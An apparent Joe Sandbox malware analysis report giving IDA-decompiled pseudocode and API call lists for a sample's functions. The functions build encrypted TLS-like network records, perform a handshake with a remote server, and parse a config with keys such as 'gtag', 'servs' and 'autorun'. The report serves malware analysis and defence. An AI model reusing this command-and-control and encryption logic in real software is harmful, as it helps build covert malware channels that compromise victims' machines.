      • Part of subcall function 003D56CF: htons.WS2_32(?), ref: 003D57B1
      • Part of subcall function 003D5853: CryptStringToBinaryA.CRYPT32(?,?,00000000,?,00000400,00000000,00000000), ref: 003D587E
    • memcpy.MSVCRT ref: 003D5F08
      • Part of subcall function 003D3B23: GetSystemTime.KERNEL32(?,?,?,?,003D5121,00000000,00001000), ref: 003D3B2D
      • Part of subcall function 003D3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003D5121,00000000,00001000), ref: 003D3B3B
      • Part of subcall function 003D3B23: __aulldiv.INT64 ref: 003D3B50
    • htonl.WS2_32(-00000096), ref: 003D5F3F
      • Part of subcall function 003DEA68: sscanf.MSVCRT ref: 003DEA7E
      • Part of subcall function 003DEA68: inet_addr.WS2_32(?), ref: 003DEA94
      • Part of subcall function 003DEA68: htons.WS2_32(?), ref: 003DEAA7
    • htons.WS2_32(00000000), ref: 003D5FAA
      • Part of subcall function 003D588E: memset.MSVCRT ref: 003D58F8
      • Part of subcall function 003D5949: memset.MSVCRT ref: 003D5979
      • Part of subcall function 003D5949: htons.WS2_32(E`=), ref: 003D5987
      • Part of subcall function 003D5949: memcpy.MSVCRT ref: 003D599B
      • Part of subcall function 003D5949: htons.WS2_32(?), ref: 003D5A0A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 28%
    			E003D4054(intOrPtr* __ebx, void* __eflags) {
    				void* _v8;
    				char _v9;
    				signed int _v16;
    				intOrPtr _v29;
    				char _v30;
    				char _v32;
    				void _v36;
    				char _v40;
    				intOrPtr _v52;
    				char _v56;
    				char _v84;
    				void* _v88;
    				char _v104;
    				char _v124;
    				char _v144;
    				char _v164;
    				void _v184;
    				void _v204;
    				void* __esi;
    				int _t85;
    				signed short _t88;
    				void* _t91;
    				void* _t102;
    				intOrPtr _t104;
    				intOrPtr* _t108;
    				signed short _t111;
    				void _t113;
    				void* _t119;
    				void* _t121;
    				intOrPtr* _t141;
    				signed int _t160;
    				signed int _t164;
    				intOrPtr* _t171;
    				signed int _t172;
    				void* _t175;
    				void* _t189;
    				void* _t202;
    				int _t204;
    				void* _t211;
    				void* _t212;
    				void* _t213;
    				void* _t216;
    
    				_t141 = __ebx;
    				_v8 =  *0x3e8538(0x100000);
    				if(E003DFD0B( *__ebx, 0x3e6670, 7) != 7 || E003DFB73( *__ebx,  &_v32, 5) != 5 || _v30 != 7) {
    					L24:
    					 *0x3e8540(_v8);
    					_t85 = 0;
    				} else {
    					_t171 = __imp__#9;
    					_t88 =  *_t171(_v29);
    					_v9 = 0;
    					_v16 = _t88 & 0x0000ffff;
    					if(E003DFB73( *__ebx, _v8, _t88 & 0x0000ffff) != _v16) {
    						goto L24;
    					} else {
    						_t91 = 0;
    						if(_v16 <= 0) {
    							goto L24;
    						} else {
    							do {
    								if( *((char*)(_t91 + _v8)) == 3) {
    									_v9 = 1;
    								}
    								_t91 = _t91 + 1;
    							} while (_t91 < _v16);
    							if(_v9 == 0 || E003DFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x81) {
    								goto L24;
    							} else {
    								_v16 =  *_t171(_v29) & 0x0000ffff;
    								if(E003DFB73( *_t141, _v8,  *_t171(_v29) & 0x0000ffff) != _v16 || E003DFB73( *_t141,  &_v32, 5) != 5 || _v30 != 0x82) {
    									goto L24;
    								} else {
    									_t172 =  *_t171(_v29) & 0x0000ffff;
    									if(E003DFB73( *_t141, _v8, _t172) != _t172 || E003DFB73( *_t141, _v8, 0x200) != 0x200) {
    										goto L24;
    									} else {
    										_t102 = _v8;
    										_t248 =  *((char*)(_t102 + 2)) - 8;
    										if( *((char*)(_t102 + 2)) != 8) {
    											goto L24;
    										} else {
    											memset(_t102, 0, 0x200);
    											asm("movsw");
    											asm("movsb");
    											_t202 = _v8;
    											_t104 = E003D3B23(_t248);
    											__imp__#8(_t104);
    											 *((intOrPtr*)(_t202 + 3)) = _t104;
    											 *((short*)(_t202 + 7)) = 0x404;
    											_t108 =  *_t141;
    											_v40 = 0x10;
    											__imp__#5( *_t108,  &_v56,  &_v40);
    											if(_t108 != 0) {
    												goto L24;
    											} else {
    												_t159 = _v52;
    												 *((intOrPtr*)(_t202 + 9)) = _v52;
    												if(E003DFD0B( *_t141, _t202, 0x200) != 0x200) {
    													goto L24;
    												} else {
    													_t111 = E003DE937(_t159);
    													_t175 = _v8;
    													_t204 = 0;
    													 *(_t141 + 4) = _t111;
    													memset(_t175, 0, 0x200);
    													_t113 =  *(_t141 + 4) & 0x0000ffff;
    													__imp__#9(_t113);
    													 *_t175 = _t113;
    													 *((char*)(_t175 + 2)) = 5;
    													do {
    														 *((char*)(_t216 + _t204 - 0x20)) = E003DE8E0();
    														_t204 = _t204 + 1;
    													} while (_t204 < 0x14);
    													_t160 = 5;
    													memcpy(_t175 + 3,  &_v36, _t160 << 2);
    													if(E003DFD0B( *_t141, _v8, 0x200) != 0x200 || E003DFB73( *_t141, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 6) {
    														goto L24;
    													} else {
    														_t164 = 5;
    														_t119 = memcpy( &_v204,  &_v36, _t164 << 2);
    														_t121 = memcpy(memcpy( &_v184, _t119 + 3, 0 << 2),  &_v204, 0 << 2);
    														_t189 = 0x29;
    														 *((char*)(_t121 + 0x28)) = 0;
    														E003D3B5C();
    														_t211 = _v8;
    														 *((char*)(_t211 + 0x28)) = 1;
    														E003D3B5C(_t211, _t189,  &_v144);
    														 *((char*)(_t211 + 0x28)) = 2;
    														E003D3B5C(_t211, _t189,  &_v124);
    														 *((char*)(_t211 + 0x28)) = 3;
    														E003D3B5C(_t211, _t189,  &_v104);
    														 *((char*)(_t211 + 0x28)) = 4;
    														E003D3B5C(_t211, _t189,  &_v84);
    														_t212 = _t141 + 8;
    														 *0x3e8ab4(_t212, _t121, _t189,  &_v164, 0xa, 5);
    														 *0x3e899c(_t212,  &_v144, 0x14);
    														_t213 = _t141 + 0x7c;
    														 *0x3e8ab4(_t213);
    														 *0x3e899c(_t213,  &_v124, 0x14);
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("movsd");
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														 *(_t141 + 0x120) =  *(_t141 + 0x120) & 0x00000000;
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														asm("stosd");
    														 *(_t141 + 0x134) =  *(_t141 + 0x134) & 0x00000000;
    														 *0x3e8540(_v8);
    														_t85 = 1;
    														__eflags = 1;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t85;
    			}

    APIs
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    • htons.WS2_32(?), ref: 003D40B3
    • htons.WS2_32(?), ref: 003D4122
    • htons.WS2_32(?), ref: 003D4165
    • memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D3B23: GetSystemTime.KERNEL32(?,?,?,?,003D5121,00000000,00001000), ref: 003D3B2D
      • Part of subcall function 003D3B23: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,003D5121,00000000,00001000), ref: 003D3B3B
      • Part of subcall function 003D3B23: __aulldiv.INT64 ref: 003D3B50
    • htonl.WS2_32(00000000), ref: 003D41C5
    • getpeername.WS2_32(?,?,?), ref: 003D41EA
    • memset.MSVCRT ref: 003D4226
    • htons.WS2_32(?), ref: 003D4233
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003D61AD(intOrPtr* _a4, signed short _a8) {
    				intOrPtr _v8;
    				void _v24;
    				char _v44;
    				void _v160;
    				void* __esi;
    				void* _t47;
    				signed int _t50;
    				intOrPtr* _t54;
    				short _t56;
    				intOrPtr* _t57;
    				void* _t75;
    				void _t82;
    				void* _t94;
    				void* _t95;
    				void* _t96;
    				signed int _t97;
    				intOrPtr _t107;
    				intOrPtr _t108;
    				intOrPtr* _t109;
    				intOrPtr* _t113;
    				void* _t117;
    				intOrPtr* _t118;
    
    				_t109 = _a4;
    				 *(_t109 + 0x468) =  *(_t109 + 0x468) & 0x00000000;
    				 *(_t109 + 0x46c) =  *(_t109 + 0x46c) & 0x00000000;
    				_t47 =  *0x3e8538(0x200);
    				_t94 = _t47;
    				_v8 =  *0x3e8538(0x200);
    				memset(_t94, 0, 0x200);
    				 *_t94 = 1;
    				_t50 =  *(_t109 + 0x138) & 0x0000ffff;
    				__imp__#9(_t50);
    				 *(_t94 + 3) = _t50;
    				sprintf( &_v24, ":%d", _a8 & 0x0000ffff);
    				_t54 =  &_v24;
    				_t95 = _t54 + 1;
    				do {
    					_t107 =  *_t54;
    					_t54 = _t54 + 1;
    				} while (_t107 != 0);
    				_t56 = _t54 - _t95 + 1;
    				__imp__#9(_t56);
    				 *((short*)(_t94 + 9)) = _t56;
    				_t57 =  &_v24;
    				_t96 = _t57 + 1;
    				do {
    					_t108 =  *_t57;
    					_t57 = _t57 + 1;
    				} while (_t108 != 0);
    				_t17 = _t94 + 0xb; // 0xb
    				memcpy(_t17,  &_v24, _t57 - _t96 + 1);
    				_t18 = _t109 + 0x338; // 0x338
    				_t117 = _t18;
    				 *0x3e899c(_t117, _t94, 0x1fd);
    				_t97 = 0x1d;
    				memcpy( &_v160, _t117, _t97 << 2);
    				 *0x3e8ab0( &_v160,  &_v44);
    				_t113 = _a4;
    				 *((intOrPtr*)(_t94 + 5)) = _v44;
    				_t26 = _t113 + 0x450; // 0x450
    				_t27 = _t113 + 0x440; // 0x440
    				_t29 = _t113 + 0x420; // 0x420
    				if(E003D3BB7(_t29, _t94, 0x1fd, _v8, _t27, _t26) == 0) {
    					L12:
    					 *0x3e8540(_t94);
    					 *0x3e8540(_v8);
    					_t75 = 0;
    				} else {
    					memset(_t94, 0, 0x200);
    					_t118 = _t113;
    					_t30 = _t118 + 0x120; // 0x120
    					_t31 = _t118 + 0x110; // 0x110
    					_t32 = _t94 + 3; // 0x3
    					_t34 = _t118 + 0xf0; // 0xf0
    					if(E003D3BB7(_t34, _v8, 0x1fd, _t32, _t31, _t30) == 0) {
    						goto L12;
    					} else {
    						_t82 =  *(_t118 + 4) & 0x0000ffff;
    						__imp__#9(_t82);
    						 *_t94 = _t82;
    						 *((char*)(_t94 + 2)) = 3;
    						if(E003DFD0B( *_t118, _t94, 0x200) != 0x200 || E003DFB73( *_t118, _t94, 0x200) != 0x200 ||  *((char*)(_t94 + 2)) != 3) {
    							goto L12;
    						} else {
    							_t85 = _t113;
    							_t38 = _t85 + 0x134; // 0x134
    							_t39 = _t85 + 0x124; // 0x124
    							_t41 = _t94 + 3; // 0x3
    							if(E003D3BB7(_t113 + 0x100, _t41, 0x1fd, _v8, _t39, _t38) == 0) {
    								goto L12;
    							} else {
    								_t42 = _t113 + 0x464; // 0x464
    								_t43 = _t113 + 0x454; // 0x454
    								if(E003D3BB7(_t113 + 0x430, _v8, 0x1fd, _t94, _t43, _t42) == 0 ||  *_t94 != 4) {
    									goto L12;
    								} else {
    									 *0x3e8540(_t94);
    									 *0x3e8540(_v8);
    									_t75 = 1;
    								}
    							}
    						}
    					}
    				}
    				return _t75;
    			}

    APIs
    • memset.MSVCRT ref: 003D61E9
    • htons.WS2_32(?), ref: 003D61FC
    • sprintf.MSVCRT ref: 003D6214
    • htons.WS2_32(?), ref: 003D622E
    • memcpy.MSVCRT ref: 003D6251
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • memset.MSVCRT ref: 003D62C3
    • htons.WS2_32(?), ref: 003D6300
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEDCE
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEDE1
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEE08
      • Part of subcall function 003DED7D: memcpy.MSVCRT ref: 003DEEA9
    • send.WS2_32(?,?,0000008B,00000000), ref: 003DFA0A
    • htons.WS2_32(00000301), ref: 003DFA3F
    • htons.WS2_32(00000001), ref: 003DFA47
    • send.WS2_32(?,?,00000006,00000000), ref: 003DFA5D
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DF4EF: recv.WS2_32(?,00000000,003DF7A5,00000000), ref: 003DF519
    • htons.WS2_32(?), ref: 003DFAEA
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 50%
    			E003CAA60(void* __ecx) {
    				void* _v8;
    				char _v12;
    				char _v16;
    				void* _v20;
    				char _v24;
    				char _v28;
    				short _v40;
    				char _v44;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t61;
    				intOrPtr _t64;
    				intOrPtr _t65;
    				intOrPtr* _t66;
    				intOrPtr* _t67;
    				intOrPtr* _t71;
    				intOrPtr* _t76;
    				void* _t77;
    				char _t78;
    				char _t79;
    				intOrPtr* _t80;
    				intOrPtr* _t83;
    				intOrPtr _t87;
    				intOrPtr* _t88;
    				intOrPtr* _t90;
    				void* _t93;
    				intOrPtr _t95;
    				void* _t127;
    				void* _t128;
    				void* _t130;
    
    				_t127 = __ecx;
    				_t61 =  *((intOrPtr*)(__ecx + 4));
    				_v20 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v28 = 0;
    				if(_t61 != 0) {
    					_push( &_v20);
    					_push(_t61);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t61 + 0xb4))))() >= 0) {
    						_t71 = _v20;
    						_push( &_v12);
    						_push(_t71);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0xa4))))() >= 0 && E003E10C0( &_v44, _v12) == 6 && _v44 == 0x6f63636d && _v40 == 0x666e) {
    							_t76 = _v20;
    							_t77 =  *((intOrPtr*)( *((intOrPtr*)( *_t76 + 0x34))))(_t76,  &_v8);
    							if(_t77 >= 0) {
    								_push(_t128);
    								if(_t77 == 1) {
    									L35:
    									_v28 = 1;
    								} else {
    									while(1) {
    										_t78 = _v12;
    										if(_t78 != 0) {
    											__imp__#6(_t78);
    										}
    										_t79 = _v16;
    										_v12 = 0;
    										if(_t79 != 0) {
    											__imp__#6(_t79);
    										}
    										_t80 = _v8;
    										_v16 = 0;
    										_push( &_v12);
    										_push(_t80);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0xa4))))() < 0) {
    											goto L36;
    										}
    										_t83 = _v8;
    										_push( &_v16);
    										_push(_t83);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x68))))() >= 0) {
    											_t31 =  &_v44; // 0x6f63636d
    											_t87 = E003E10C0(_t31, _v12);
    											if(_t87 != 3) {
    												if(_t87 != 4) {
    													if(_t87 != 5) {
    														if(_t87 != 7 || _v44 != 0x6f747561 || _v40 != 0x6e7572) {
    															goto L33;
    														} else {
    															_t93 = E003CDCD0(_t127, _t127, _t128, _v8);
    															goto L32;
    														}
    													} else {
    														if(_v44 != 0x76726573 || _v40 != 0x73) {
    															goto L33;
    														} else {
    															_t93 = E003C3E30(_t127, _v8);
    															L32:
    															if(_t93 != 0) {
    																goto L33;
    															}
    														}
    													}
    												} else {
    													if(_v44 == 0x67617467) {
    														_t95 =  *((intOrPtr*)(_t127 + 0x14));
    														if(_t95 != 0) {
    															_t95 = E003CBB40(_t95);
    															_t130 = _t130 + 4;
    														}
    														__imp__#2(_v16);
    														 *((intOrPtr*)(_t127 + 0x14)) = _t95;
    													}
    													goto L33;
    												}
    											} else {
    												if(_v44 == 0x726576) {
    													__imp___wtoi(_v16);
    													_t130 = _t130 + 4;
    													 *((intOrPtr*)(_t127 + 0x10)) = _t87;
    												}
    												L33:
    												_t88 = _v8;
    												_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0x40))))(_t88,  &_v24);
    												if(_t128 >= 0) {
    													_t90 = _v8;
    													 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
    													_v8 = _v24;
    													_v24 = 0;
    													if(_t128 != 1) {
    														continue;
    													} else {
    														goto L35;
    													}
    												}
    											}
    										}
    										goto L36;
    									}
    								}
    								L36:
    							}
    						}
    					}
    					_t64 = _v16;
    					if(_t64 != 0) {
    						__imp__#6(_t64);
    					}
    					_t65 = _v12;
    					if(_t65 != 0) {
    						__imp__#6(_t65);
    					}
    					_t66 = _v8;
    					if(_t66 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t66 + 8))))(_t66);
    					}
    					_t67 = _v20;
    					if(_t67 != 0) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))(_t67);
    					}
    					return _v28;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003CAC57
      • Part of subcall function 003E10C0: tolower.MSVCRT ref: 003E10FB
    • SysFreeString.OLEAUT32(?), ref: 003CAB18
    • SysFreeString.OLEAUT32(?), ref: 003CAB29
    • SysAllocString.OLEAUT32(?), ref: 003CABB4
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • _wtoi.MSVCRT ref: 003CAB84
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDD78
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDD85
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDD92
      • Part of subcall function 003CDCD0: ??2@YAPAXI@Z.MSVCRT ref: 003CDE65
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDEB9
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDEC3
      • Part of subcall function 003CDCD0: SysFreeString.OLEAUT32(?), ref: 003CDECD
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C3F48
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C3F5D
      • Part of subcall function 003C3E30: _wtoi.MSVCRT ref: 003C400E
      • Part of subcall function 003C3E30: rand.MSVCRT ref: 003C4080
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C422F
      • Part of subcall function 003C3E30: SysFreeString.OLEAUT32(?), ref: 003C423D
    • SysFreeString.OLEAUT32(?), ref: 003CAC49
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 18%
    			E003DFD0B(void* _a4, char _a8, signed int _a12) {
    				char _v5;
    				char _v6;
    				char _v7;
    				void* _v8;
    				signed int _v9;
    				char _v10;
    				char _v11;
    				void _v12;
    				char* _v16;
    				signed int _v20;
    				void _v44;
    				signed int _t83;
    				signed int _t89;
    				void* _t98;
    				int _t99;
    				short _t108;
    				short _t109;
    				signed int _t116;
    				intOrPtr* _t120;
    				signed int _t130;
    				signed int _t132;
    				void* _t146;
    				int _t148;
    				intOrPtr* _t153;
    				void* _t155;
    				void* _t156;
    				signed int _t159;
    				char* _t160;
    				void* _t163;
    
    				_t120 = _a4;
    				_t148 = _a12;
    				if(( *(_t120 + 0x10070) & 0x00000001) != 0 && _t148 != 0) {
    					_t4 =  &_a8; // 0x3d407c
    					E003DFD0B(_t120,  *_t4, 0);
    					_t163 = _t163 + 0xc;
    				}
    				_t156 =  *0x3e8538(_t148 + 0x40);
    				_a4 = _t156;
    				_v16 =  *0x3e8538(_t148 + 0x40);
    				_t83 =  *(_t120 + 0x10074);
    				_v12 = _t83 >> 0x18;
    				_v11 = _t83 >> 0x10;
    				_v10 = _t83 >> 8;
    				_v9 = _t83;
    				_v8 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x18;
    				_v20 = _t83;
    				_v7 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x10;
    				_v5 =  *(_t120 + 0x10070);
    				 *_t156 = _v12;
    				_v6 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 8;
    				 *((intOrPtr*)(_t156 + 4)) = _v8;
    				_t89 =  *(_t120 + 0x10070) |  *(_t120 + 0x10074);
    				if(_t89 != 0) {
    					 *((char*)(_t156 + 8)) = 0x17;
    				} else {
    					 *((char*)(_t156 + 8)) = 0x16;
    				}
    				 *((short*)(_t156 + 9)) = 0x103;
    				__imp__#9(_t148);
    				_t43 =  &_a8; // 0x3d407c
    				 *(_t156 + 0xb) = _t89;
    				_t45 = _t156 + 0xd; // 0xd
    				memcpy(_t45,  *_t43, _t148);
    				E003DEC77(_t120 + 4, 0x14, _t156, _t148 + 0xd,  &_v44);
    				_t49 =  &_a8; // 0x3d407c
    				memcpy(_t156,  *_t49, _t148);
    				_t146 = _t156 + _t148;
    				_t130 = 5;
    				memcpy(_t146,  &_v44, _t130 << 2);
    				_t132 = _a12;
    				_t159 = _t132 + 0x00000014 & 0x8000000f;
    				if(_t159 < 0) {
    					_t159 = (_t159 - 0x00000001 | 0xfffffff0) + 1;
    				}
    				_t98 = 0x10;
    				_t99 = _t98 - _t159;
    				if(_t99 != 0) {
    					if(_t99 == 1) {
    						_push(0x11);
    						goto L12;
    					}
    				} else {
    					_push(0x10);
    					L12:
    					_pop(_t99);
    				}
    				_t56 = _t132 + 0x14; // 0x25
    				_v8 = _t99 + _t56;
    				memset(_t146 + 0x14, _t99 - 1, _t99);
    				_t160 = _v16;
    				if(E003DEF6B(_a4, _t99 + _t56, _t160 + 5, _t120 + 0x2c, _t120 + 0x4c, 1) != 0) {
    					if(( *(_t120 + 0x10070) |  *(_t120 + 0x10074)) != 0) {
    						 *_t160 = 0x17;
    					} else {
    						 *_t160 = 0x16;
    					}
    					_t153 = __imp__#9;
    					_t108 =  *_t153(0x301);
    					 *((short*)(_t160 + 1)) = _t108;
    					_t109 =  *_t153(_v8);
    					_t155 = _v8 + 5;
    					 *((short*)(_t160 + 3)) = _t109;
    					__imp__#19( *_t120, _t160, _t155, 0);
    					_v16 = _t109;
    					 *0x3e8540(_t160);
    					 *0x3e8540(_a4);
    					 *(_t120 + 0x10070) =  *(_t120 + 0x10070) + 1;
    					asm("adc dword [ebx+0x10074], 0x0");
    					asm("sbb eax, eax");
    					_t116 =  !( ~(_v16 - _t155)) & _a12;
    				} else {
    					 *0x3e8540(_t160);
    					 *0x3e8540(_a4);
    					_t116 = 0;
    				}
    				return _t116;
    			}

    APIs
    • htons.WS2_32(?), ref: 003DFDE5
    • memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC88
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC98
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECA7
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECB9
    • memcpy.MSVCRT ref: 003DFE15
    • memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003DEFA8
      • Part of subcall function 003DEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003DEFF7
      • Part of subcall function 003DEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003DF00A
      • Part of subcall function 003DEF6B: memcpy.MSVCRT ref: 003DF01E
